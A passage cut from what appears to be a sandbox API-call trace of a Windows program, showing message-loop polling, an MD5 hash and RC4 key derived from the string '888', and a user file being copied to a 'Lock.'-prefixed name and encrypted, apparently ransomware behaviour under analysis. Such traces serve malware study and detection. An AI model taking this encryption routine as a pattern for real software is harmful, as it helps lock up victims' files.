hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.339] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.339] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.339] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.339] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.339] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.339] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0223.340] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.340] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0223.340] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.340] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.340] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.340] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.340] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.340] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.340] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.340] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0223.340] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.340] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0223.340] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.340] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.340] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.340] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.340] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.340] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.340] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.340] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0223.340] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.340] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0223.340] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.340] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.340] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0223.341] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.341] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0223.341] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.341] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.341] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.341] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.341] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0223.341] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.341] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0223.341] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.341] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.341] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.341] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.341] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.341] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.341] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.341] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.341] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.341] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.341] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.341] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0223.341] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.341] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0223.341] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.342] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.342] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0223.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aabc08, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0223.342] CryptCreateHash (in: hProv=0xa7bf78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0223.342] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.342] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.342] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.342] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0223.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71c98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0223.342] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0223.342] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0223.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71bb8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0223.342] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.346] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.346] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.346] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.346] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.346] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.346] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0223.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaba88, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0223.347] CryptHashData (hHash=0x9e2138, pbData=0x2a71d88, dwDataLen=0x3, dwFlags=0x1) returned 1 [0223.347] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.347] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.347] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.347] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.347] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.354] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.354] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.354] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.354] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0223.354] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.354] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0223.355] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.355] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.355] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0223.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aabb30, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0223.355] CryptDeriveKey (in: hProv=0xa7bf78, Algid=0x6601, hBaseData=0x9e2138, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2238) returned 1 [0223.355] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.355] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.355] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.355] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.355] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.355] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0223.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6e80, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0223.355] CryptDestroyHash (hHash=0x9e2138) returned 1 [0223.356] CreateFileW (lpFileName="C:\\Users\\Public\\Documents/My Music" (normalized: "c:\\users\\public\\documents\\my music"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0223.356] GetLastError () returned 0x5 [0223.356] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents/" (normalized: "c:\\users\\public\\documents")) returned 0x11 [0223.356] CreateFileW (lpFileName="C:\\Users\\Public\\Documents/Lock.My Music" (normalized: "c:\\users\\public\\documents\\lock.my music"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b0 [0223.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70a0 [0223.357] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0223.357] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0223.357] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0223.357] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0223.357] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0223.357] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0223.357] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0223.357] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0223.357] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.357] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.357] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba88 [0223.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0223.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0223.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc20 [0223.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0223.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd) returned 0x2aabce0 [0223.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabce0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0223.358] CryptEncrypt (in: hKey=0x9e2238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0223.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x38667f8 [0223.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0223.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0223.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabce0 [0223.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb60 [0223.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabd28 [0223.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0223.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd28 | out: hHeap=0x2af0000) returned 1 [0223.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0223.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb60 | out: hHeap=0x2af0000) returned 1 [0223.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc80 [0223.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb18 [0223.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabad0 [0223.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0223.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabad0 | out: hHeap=0x2af0000) returned 1 [0223.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0223.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0223.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabd10 [0223.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabbc0 [0223.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabd28 [0223.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0223.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd28 | out: hHeap=0x2af0000) returned 1 [0223.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0223.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbc0 | out: hHeap=0x2af0000) returned 1 [0223.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb60 [0223.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabad0 [0223.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabcc8 [0223.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0223.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcc8 | out: hHeap=0x2af0000) returned 1 [0223.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0223.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabad0 | out: hHeap=0x2af0000) returned 1 [0223.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc20 [0223.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabcc8 [0223.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabbc0 [0223.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0223.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbc0 | out: hHeap=0x2af0000) returned 1 [0223.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0223.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcc8 | out: hHeap=0x2af0000) returned 1 [0223.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabcf8 [0223.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabcc8 [0223.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabd28 [0223.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0223.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd28 | out: hHeap=0x2af0000) returned 1 [0223.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0223.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcc8 | out: hHeap=0x2af0000) returned 1 [0223.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 